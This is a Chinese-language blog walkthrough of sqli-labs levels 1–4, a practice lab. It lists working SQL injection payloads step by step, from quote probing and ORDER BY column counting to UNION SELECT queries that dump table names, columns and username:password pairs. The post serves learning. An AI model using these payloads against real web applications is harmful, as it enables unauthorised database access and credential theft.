sqli-lab闖關1—4

The first

第一步:判斷閉合符號,輸入單引號,看看是否報錯,這裏就報錯了,當然註釋符有好多種('"#--+)這裏輸入單引號就行了,報錯了。
根據報錯信息,可以確定輸入參數的內容被存放到一對單引號中間。這裏我很迷,到了第二關,也是報錯,先不說,就是有沒有人懵逼這個報錯怎麼看是不是需要單引號??是什麼類型的注入???和我一樣的新手看到這裏不懂請自動忽略,等到第二關再回來看,就會明白了,這個依據就是:你仔細看第一關和第二關的第一步報錯對比一下,認真看,看看是不是第一張圖片那個LIMIT前面那個1兩邊是有雙引號的,第二張圖就沒有。仔細品😎😎😎
輸入:

?id=1'

在這裏插入圖片描述
第二步:判斷列數用order by語句
輸入:

?id=1' order by 1--+

在這裏插入圖片描述
然後把1換成2,再換成3,判斷下去,直到報錯爲止。依次判斷,這裏是到4,報錯。
在這裏插入圖片描述
(附圖作參考,如果沒有出現這個頁面,那麼就是SQL語句輸入錯誤,檢查語句。)
第三步:聯合注入爆數據庫令 id=非正確值,這裏我使id=0。
至於爲什麼?哪有呢麼多爲什麼、我也不知道,hhh🤣🤣🤣

?id=0' union select 1,2,database()--+

在這裏插入圖片描述
這裏,database()放在2或者3的位置都可以,注意,如果放在2的位置上的話,後面的3不能丟,這個錯誤很容易犯,所以,我就放在3的位置上,這樣也不會忘。😂😂
第四步:爆數據表

?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

在這裏插入圖片描述
顯然users是用戶數據表,爲什麼?單詞告訴我的,那三個像嗎?就算猜也要給我猜這個!😎😎😎
第五步:爆字段

?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

看到了,那麼大的username,password😁😁在這裏插入圖片描述
最最最後一步了,爆值:

?id=0' union select 1,2,group_concat(username,0x3a,password) from users--+

0x3a意思是“:
在這裏插入圖片描述
這都是哈哈哈,恭喜通關!✌✌✌✌

The second

第一步:還是先判斷有無閉合符號,然後輸入?id=1'
在這裏插入圖片描述
根據報錯信息確定輸入的內容被帶入到數據庫中,也可叫做數字型注入。懵逼了沒,爲什麼?怎麼看出來的?跟第一關有什麼不同?再回過頭去看看文章開頭第一關那裏能不能看出來就靠自己了,反正我是看懂了,hhh
跟第一關的步驟一樣,只是,不再需要這個'單引號了。
就不再重複了,我把結果放出來吧,證明是可行的。😜😜😜
在這裏插入圖片描述

The third

第三關和前面一樣,只是閉合符號又不一樣這次的是,看圓括號
在這裏插入圖片描述
好了,其他還是跟上面一樣,不說了,太困了,啊啊!睡覺,,今天又熬夜了,心疼我的頭髮,害!!對了,留一張圖,證明我來過。。。。。
在這裏插入圖片描述
晚安,來不及回首說拜拜。


上面是一條華麗的分界線,進行下一關

The fourth

第一步仍然是判斷閉合符號,先判斷單引號
在這裏插入圖片描述
沒有報錯。那就不是,再試雙引號

報錯,根據報錯信息判斷出輸入的內容被放到一對雙引號和圓括號中啦。
接下來就該判斷列數,

?id=1") order by 1--+

還是到4報錯了,
在這裏插入圖片描述
到這裏,不判斷他的數據庫名來試試,直接爆表名,(我看其他博主的博客有這麼做的,我也來試試,省去爆庫的步驟了)

?id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

在這裏插入圖片描述
哇!真的可以。
在這裏插入圖片描述
解釋一下哈,剛沒有爆庫名,所以我不知道在哪個庫裏面,然後,我把語句改成這樣啦where table_schema=database()就是從table_schema=database(),這個庫裏直接爆表,也是可以的。目前剛瞭解到,還是先老老實實的爆先爆庫名。
繼續繼續hhh,爆列:

?id=0") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

跟前幾關一樣了
在這裏插入圖片描述
最後爆值,

?id=0") union select 1,group_concat(username,0x3a,password),3 from users--+

在這裏插入圖片描述OK,收工~
學習感受:感覺emmmmmm, 非常有趣,說實話,我是個笨蛋,沒別人記得快,我做了好多遍才記住這個步驟的,做的時候呢…忘這忘那的,很粗心,做不好又非常着急,特別容易緊張,腦子就不知道怎麼想了。不過我並不比別人差,說不定他們也是練得比較多,付出的努力更多呢。而且我對這個很感興趣,都說興趣是最好的老師,付出肯定會得到回報,給自己喊句奧利給!!!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章